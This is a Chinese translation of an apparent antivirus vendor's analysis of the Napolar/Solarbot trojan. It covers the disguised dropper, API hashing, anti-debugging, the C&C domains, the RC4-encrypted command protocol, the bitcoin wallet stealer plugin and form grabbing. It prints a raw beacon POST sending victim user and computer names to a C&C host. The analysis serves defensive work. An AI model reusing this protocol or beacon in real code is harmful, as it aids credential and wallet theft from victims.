天天看點

Win32/64-Napolar 木馬界的明星

在最近幾個星期裡的AVAST惡意樣本分析名單中,Win32/64:Napolar擁有極高的檔案和網絡屏蔽率。另外,我們發現了被冠以Solarbot名稱的新型木馬于2013年5月左右開始做出其相關宣傳廣告,而這種廣告并沒有釋出在大家經常通路的黑客論壇,而是在由主流搜尋引擎索引的一個叫solarbot.net的網站,它擁有一個非常專業的外觀設計。

Win32/64-Napolar 木馬界的明星
對于Win32/64:Napolar木馬,它的程序間通信管道名稱是\\.\pipe\napSolar。再加上存在的類似“CHROME.DLL”、“OPERA.DLL”、“trusteer”、“data_inject”等字元串,以及後面會提到的功能特征,是以我們确定它和Solarbot間存在某種關聯。讓我們來看看下面的分析。

Dropper

該檔案最初以自解壓的壓縮檔案形式存在,以類似Photo_021-WWW.FACEBOOK.COM.exe這樣的格式命名,并執行2項工作:靜默執行dropper以及展示類似下面的辣妹照片(譯者注:馬賽克是人類文明進步最大的絆腳石):

作者的聲明中宣稱Solarbot由Free Pascal的Lazarus IDE所編寫,但我們想不出任何專業或者商業性質的木馬有此類似特點。從另一個角度來講,我們不能确定該代碼是否用Free Pascal編寫的,因為它PE頭部的許多資訊都不同于一般的用Free Pascal編譯的二進制檔案。

核心可執行檔案的結構如下:

Win32/64-Napolar 木馬界的明星

x86初始的部分,同時也用于識别系統的體系結構。而在64位系統中,還有一個通信子產品被解壓和加載。LDE64(長度反彙編引擎)是一個32位基于BeaEngine下的官方工具,它能夠進行32位和64位架構指令解碼。對于系統函數的修改來說反彙編工作必不可少(確定成功的挂鈎一個定制的或模拟的源代碼塊)。

如網站廣告中提到的,KERNEL32.DLL、NTDLL.DLL、WININET.DLL、SHLWAPI.DLL、PASPI.DLL中的所有重要函數都進行了CRC32哈希處理(CRC32哈希常數表結構位址在0xFF395A)并将其儲存在虛拟表單中。與IsDebuggerPresent、OutputDebugString函數相關的反調試技巧也在此有所展現。安裝到%AppData\lsass.exe後,在新申請的記憶體空間0xFE0000處開始運作,之後bot會自行關閉,這意味着它不會在程序清單中被發現。

為了了解被這種木馬感染的地區分布情況,我們分析了相關檢測部分的運作狀況。結果表明,每天至少有幾百台計算機被感染,而這個數字相對于全部Solarbot樣本來講數量略多。受到感染影響最嚴重的區域為中南美的哥倫比亞、委内瑞拉、秘魯、墨西哥、阿根廷以及亞洲的菲利賓、越南和歐洲的波蘭。

Win32/64-Napolar 木馬界的明星

通信協定

目前發現的C&C伺服器有:xyz25.com、cmeef.info、paloshke.org。而後者注冊于臭名昭著的Bizcn.com公司。我們曾在部落格中提到的一款虛假修複工具即注冊在這家具有欺詐性質的中國注冊商下。廣告站solarbot.net的注冊資訊如下:

Domain Name: SOLARBOT.NET

Registrar: NETEARTH ONE INC. D/B/A NETEARTH

Whois Server: whois.advancedregistrar.com

Referral URL:

http://www.advancedregistrar.com

Name Server: NS1.BITCOIN-DNS.COM

Name Server: NS2.BITCOIN-DNS.COM

Status: clientTransferProhibited

Updated Date: 01-aug-2013

Creation Date: 01-aug-2013

Expiration Date: 01-aug-2014

注冊資料中聯系資訊被隐藏在PRIVACYPROTECT.ORG後面,它吸引了衆多的涉及惡意活動的團體。

擷取執行指令的HTTP POST請求如下所示:

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;

Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR

3.0.4506.2152; .NET CLR 3.5.30729)

Host: www.paloshke.org

Content-Length: 81

Pragma: no-cache

v=1.0&u=USER_NAME&c=COMP_NAME&s={7C79CE12-E753-D05E-0DE6-DFBF7B79CE12}&w=2.5.1&b=32

其中s字元表示一個從受害人環境擷取的,随之生成的RC4解密密匙,v代表bot的版本,數字1.0表示這個bot的初始開發階段。

在成功的請求了之後,會得到響應。就像我們所提到的那樣,它是由RC4進行加密的,通過POST查詢字段發送未加密的正确密鑰。響應結構采用以0分割的字元串數組的形式。每個字元串開頭使用一個位元組來表示指令号碼(已觀察到15個不同的指令),再加上相應的字元串:在連接配接延遲(指令0xC)中是秒數(一般為3600);對于下載下傳指令(指令0×12),是檔案的URL位址、控制哈希以及一個解密密鑰;0×2指令安裝額外的檔案WalletSteal.bin,一個比特币錢包的偷竊插件。根據bitcoin.org,比特币錢包就相當于比特币網絡中的實體錢包,它包含有允許使用者在比特币交易中使用的密鑰。實際上,這就是之前說的關于插件支援的例子。插件加密放在%AppData中的臨時目錄SlrPlugin中。

特點

以下特點清單就是在網站上所展示的:

Win32/64-Napolar 木馬界的明星

我們已看到FTP和POP3掠奪,反向Socks5或者基礎功能子產品的實作。有相關的字元串(“SSL”、“http://”、“https://”、web浏覽器庫的名字、“NSS layer”、“data_start”、“data_inject”、“data_end”)反映了從浏覽器發起攻擊的可能性。确實,我們發現網絡銀行論壇的内容以未加密的方法發送到C&C伺服器上,但這僅在網站要求信譽或者證書驗證時發生。這可能和以下内置的URL清單有關:

https://urs.microsoft.com/urs.asmx

http://ocsp.verisign.com

http://ocsp.comodoca.com

http://safebrowsing.clients.google.com

http://dirpop.naver.com:8088/search.naver

而後通過内部指令0xF進行遠端更新。

接下來我們觀察到,它下載下傳了一個比特币挖掘機,并将其注入到系統臨時目錄的記事本檔案中進行了執行(對應清單中的“MD5版本更新和系統下載下傳”)。

最後,我們不得不說這個bot所展示的強悍的惡意能力,再加上$200的合理價格,近期很有可能大量湧現。幸運的是,針對此的反病毒軟體将會應運而生,使這些網絡犯罪種類更加的難以生存。